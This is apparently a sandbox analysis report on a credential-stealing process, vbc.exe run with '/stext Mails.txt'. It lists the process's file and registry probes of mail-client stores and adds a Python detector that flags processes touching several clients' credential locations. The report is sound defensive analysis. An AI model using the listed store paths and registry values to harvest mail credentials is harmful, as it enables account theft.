Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:01:04, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
Information Value
PID 0x594
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x4A4, 0x8CC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA
buffer 0x00400000 0x0041AFFF Marked Executable - 32-bit 0x00410E58, 0x0040D6E0, ... False False
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt 475 bytes MD5: 0e8d54d411f43f166821d012d45b1199
SHA1: a102c887b7ee1e8f1e2555e30c1c58015248251b
SHA256: 72ee1a9d65acc2cf4fea9c11dbec1e6ee7b67fed882b5fd37d69c3692814b4df
SSDeep: 6:QAXqqq9UMe7PQDC+8ADAwzRIjMw1NAmYezRSJcnDWpSnDWAwb:QZ9UHr+8ADzRIRvGe9SJgyp6yAwb
False
Host Behavior
File (32)
Operation Filename Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc_lng.ini type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 50 True 2
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 2 True 3
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 29 True 2
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 52 True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 40 True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 26 True 2
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 22 True 4
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 24 True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 28 True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 27 True 1
(18 writes totalling 475 bytes, the size of the dropped Mails.txt above)
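Process #5 does not read one mail client's settings; it probes every store it knows about: the Windows Mail .oeaccount files, the Thunderbird and Mozilla profile directories, and in the Registry table that follows the Eudora, Google Talk, Google Desktop, IncrediMail, Group Mail, Windows Live Mail, Yahoo Pager and MSN Messenger keys, the Internet Account Manager keys and the Outlook profile account subkeys, from which it reads POP3 User, POP3 Server, Display Name, Email and SMTP Server. Most probes fail because the software is not installed on the analysis machine, and that breadth is itself the detection: a real mail client reads only its own store. The Python below is an added example and not part of the report: it groups file and registry access events by process and flags any process that reaches into three or more distinct clients' credential stores, counting failed opens as probes. The events are constructed from rows on this page plus one benign outlook.exe event for contrast; the path patterns encode only locations that appear in this report.

```python
import re

# Credential-store locations that process #5 probes on this page, one regex per client.
# Patterns are matched case-insensitively against the raw file or registry path.
STORE_PATTERNS = {
    "windows_mail":      r"\\microsoft\\windows mail\\account.*\.oeaccount$",
    "thunderbird":       r"\\thunderbird\\profiles",
    "mozilla_profiles":  r"\\mozilla\\profiles",
    "eudora":            r"\\qualcomm\\eudora",
    "google_talk":       r"\\google\\google talk\\accounts",
    "google_desktop":    r"\\google\\google desktop\\mailboxes",
    "outlook_iam":       r"\\internet account manager\\accounts",
    "outlook_omi":       r"\\omi account manager\\accounts",
    "outlook_profile":   r"\\profiles\\outlook\\9375cff0413111d3b88a00104b2a6676",
    "outlook_2013_2016": r"\\office\\1[56]\.0\\outlook\\profiles",
    "incredimail":       r"\\incredimail\\identities",
    "group_mail":        r"\\group mail$",
    "windows_live_mail": r"\\windows live mail$",
    "yahoo_messenger":   r"\\yahoo\\pager",
    "msn_messenger":     r"\\msnmessenger$|\\messengerservice$",
}
STORE_PATTERNS = {name: re.compile(rx, re.IGNORECASE) for name, rx in STORE_PATTERNS.items()}

# Constructed access events (pid, image, kind, path, success) taken from the File and
# Registry tables for process #5, plus one benign outlook.exe event that is not from the report.
SAMPLE_EVENTS = [
    (0x594, "vbc.exe", "file", r"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", True),
    (0x594, "vbc.exe", "file", r"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles", False),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine", False),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts", False),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003", True),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles", False),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities", False),
    (0x594, "vbc.exe", "reg", r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail", False),
    (0x1234, "outlook.exe", "reg", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003", True),
]


def classify_store(path):
    """Name the client whose credential store a path belongs to, or None."""
    for name, rx in STORE_PATTERNS.items():
        if rx.search(path):
            return name
    return None


def find_credential_harvesters(events, min_distinct_clients=3):
    """Map (pid, image) to the sorted list of stores touched, for processes over the threshold.

    Failed opens are counted: the probe, not its outcome, is the evidence."""
    touched = {}
    for pid, image, _kind, path, _success in events:
        store = classify_store(path)
        if store:
            touched.setdefault((pid, image), set()).add(store)
    return {key: sorted(stores) for key, stores in touched.items()
            if len(stores) >= min_distinct_clients}


if __name__ == "__main__":
    for (pid, image), stores in find_credential_harvesters(SAMPLE_EVENTS).items():
        print(hex(pid), image, stores)
```

The same grouping works on Sysmon file-create and registry events or on EDR telemetry; the threshold of three clients keeps a single mail program reading its own configuration, as outlook.exe does in the sample, below the line.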
Registry (124)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Fn
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = POP3 User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = SMTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = POP3 User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = SMTP User, data = 103, type = REG_NONE False 1
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
